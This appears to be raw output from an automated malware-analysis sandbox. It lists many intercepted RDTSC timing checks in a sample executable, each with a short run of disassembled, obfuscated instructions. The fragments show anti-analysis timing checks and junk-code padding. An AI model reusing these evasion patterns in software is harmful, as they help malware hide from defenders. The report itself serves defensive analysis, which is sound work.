Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 971035 second address: 97103B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 972F4A second address: 972F50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 972F50 second address: 972F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 97AD45 second address: 97AD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 97AD4B second address: 97AD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 971FBB second address: 971FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 97CC15 second address: 97CCAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F88FCB145C8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007F88FCB145D5h 0x00000029 mov dword ptr [ebp+12A7250Bh], esi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F88FCB145C8h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b mov dword ptr [ebp+12A726A0h], esi 0x00000051 xor dword ptr [ebp+12A72F0Bh], esi 0x00000057 mov dword ptr [ebp+12A71B85h], eax 0x0000005d push 00000000h 0x0000005f mov edi, dword ptr [ebp+12A7260Ch] 0x00000065 push eax 0x00000066 pushad 0x00000067 pushad 0x00000068 jl 00007F88FCB145C6h 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9770DC second address: 9770E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 97FDF2 second address: 97FE6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F88FCB145D8h 0x00000011 jmp 00007F88FCB145CFh 0x00000016 popad 0x00000017 jmp 00007F88FCB145D9h 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007F88FCB145C6h 0x00000024 jmp 00007F88FCB145D0h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 97802C second address: 978030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 979EDF second address: 979EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 97FE6B second address: 97FE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 97BD9B second address: 97BD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 919862 second address: 919868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 979FCD second address: 979FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9760A0 second address: 9760A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 97BE72 second address: 97BE84 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F88FCB145C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F88FCB145C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9818C0 second address: 9818C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9818C6 second address: 9818CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 98E521 second address: 98E537 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F88FCAE429Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F88FCAE4296h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 91E996 second address: 91E99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 91E99A second address: 91E9B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCAE42A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 91E9B0 second address: 91E9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 91E9BA second address: 91E9C6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F88FCAE4296h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 91E9C6 second address: 91E9DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F88FCB145CEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 98DE1E second address: 98DE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 98DE27 second address: 98DE3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145CAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 98DF85 second address: 98DF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 98E10B second address: 98E111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9940ED second address: 9940F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 999B75 second address: 999B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F88FCB145C6h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F88FCB145CAh 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 999B90 second address: 999B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F88FCAE4296h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 99A2B4 second address: 99A2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 99A2BC second address: 99A2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9270B5 second address: 9270C5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F88FCB145C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9270C5 second address: 9270C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9270C9 second address: 9270DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007F88FCB145C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A0154 second address: 9A019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F88FCAE4298h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F88FCAE42AFh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jmp 00007F88FCAE42A7h 0x0000001d pushad 0x0000001e jmp 00007F88FCAE42A7h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A019F second address: 9A01A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A01A4 second address: 9A01BA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F88FCAE429Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F88FCAE4296h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 99FBCC second address: 99FBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 99FBD2 second address: 99FBD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 99FBD7 second address: 99FBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 99FBDD second address: 99FC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F88FCAE42A2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F88FCAE42C5h 0x00000014 push edx 0x00000015 jmp 00007F88FCAE42A7h 0x0000001a push edx 0x0000001b pop edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 99FC1D second address: 99FC21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 99FC21 second address: 99FC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A7E69 second address: 9A7E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A7FE3 second address: 9A7FFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F88FCAE429Ah 0x0000000a pop edi 0x0000000b je 00007F88FCAE429Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A82D0 second address: 9A82E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F88FCB145C6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F88FCB145C8h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A82E7 second address: 9A82F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007F88FCAE4296h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A82F5 second address: 9A831B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 ja 00007F88FCB145C6h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F88FCB145CCh 0x00000014 jmp 00007F88FCB145CBh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A845B second address: 9A8461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A8461 second address: 9A8470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F88FCB145CEh 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A8470 second address: 9A847A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A847A second address: 9A8480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A8744 second address: 9A8748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A8748 second address: 9A8771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F88FCB145CFh 0x0000000e js 00007F88FCB145C6h 0x00000014 jmp 00007F88FCB145CAh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9A8CDF second address: 9A8CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9AC487 second address: 9AC48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 921F64 second address: 921F86 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F88FCAE42B4h 0x00000008 jmp 00007F88FCAE42A8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9638BB second address: 9638E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 pushad 0x00000008 xor edi, dword ptr [ebp+12A732BBh] 0x0000000e mov dword ptr [ebp+12A7292Dh], esi 0x00000014 popad 0x00000015 lea eax, dword ptr [ebp+12C1D65Ch] 0x0000001b mov cl, ah 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007F88FCB145CCh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9639DD second address: 9639E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 963EBB second address: 963EC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F88FCB145C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 963FB0 second address: 963FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 963FB4 second address: 963FB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 963FB8 second address: 963FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F88FCAE42A9h 0x00000012 jmp 00007F88FCAE42A3h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 963FDD second address: 964015 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F88FCB145CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 jmp 00007F88FCB145D6h 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9641B9 second address: 9641BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964395 second address: 964399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964399 second address: 96439F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96439F second address: 9643A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964769 second address: 964796 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 0000001Eh 0x0000000b push edx 0x0000000c mov ecx, dword ptr [ebp+12A725F7h] 0x00000012 pop ecx 0x00000013 nop 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F88FCAE42A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964796 second address: 9647B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F88FCB145CCh 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9647B8 second address: 9647E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCAE42A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F88FCAE42A8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964923 second address: 964927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964B6A second address: 964B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964B6F second address: 964BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+12A723E2h], eax 0x00000010 lea eax, dword ptr [ebp+12C1D6A0h] 0x00000016 movsx ecx, dx 0x00000019 nop 0x0000001a push edx 0x0000001b pushad 0x0000001c jo 00007F88FCB145C6h 0x00000022 jmp 00007F88FCB145D3h 0x00000027 popad 0x00000028 pop edx 0x00000029 push eax 0x0000002a jmp 00007F88FCB145D9h 0x0000002f nop 0x00000030 cmc 0x00000031 lea eax, dword ptr [ebp+12C1D65Ch] 0x00000037 cld 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b push edi 0x0000003c js 00007F88FCB145C6h 0x00000042 pop edi 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B27D6 second address: 9B27F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F88FCAE42A3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B27F2 second address: 9B2814 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F88FCB145CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnl 00007F88FCB145C6h 0x00000015 jg 00007F88FCB145C6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B2B45 second address: 9B2B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B2B4B second address: 9B2B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B2B4F second address: 9B2B59 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F88FCAE4296h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B2CD6 second address: 9B2CE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F88FCB145C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B724B second address: 9B725A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F88FCAE4296h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B725A second address: 9B7262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B6DB0 second address: 9B6DBA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F88FCAE4296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B9B2B second address: 9B9B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B9B31 second address: 9B9B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B9CA6 second address: 9B9CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
